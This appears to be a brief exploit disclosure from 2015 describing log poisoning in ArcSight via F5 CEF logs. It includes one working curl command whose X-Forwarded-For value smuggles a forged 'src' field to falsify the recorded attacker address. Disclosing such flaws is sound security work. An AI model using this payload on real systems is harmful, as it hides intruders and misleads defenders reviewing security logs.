ArcSight suffers from a log poisoning vulnerability.
fc2f4788f873862fc266d71b5a6c6655034f7c3ae00f59103be393d90706c07b
Exploit Title: ArcSight Log Poisoning on F5 CEF log
Date: Jun 25th 2015
Exploit Author: Andrea Menin (linkedin.com/in/andreamenin)
Video: https://www.youtube.com/watch?v=SgFHt37p_Lw
Description:
------------
Change the attacker address value on ArcSight report by poisoning F5 log.
An Attacker can request a page with a "malicious header" and replace the
content of "src" CEF parameter.
Exploit:
--------
Firing a F5 ASM rule, you can inject the "src" parameter inside the
X-Forwarded-For header parameter:
curl -v -H "X-Forwarded-For: 127.0.0.1 src=8.8.8.8 cs6=" "http://<dest ip>/cmd.exe"
Video:
------
https://www.youtube.com/watch?v=SgFHt37p_Lw
--
Andrea (aka theMiddle) Menin
menin.andrea [at] gmail.com
linkedin.com/in/andreamenin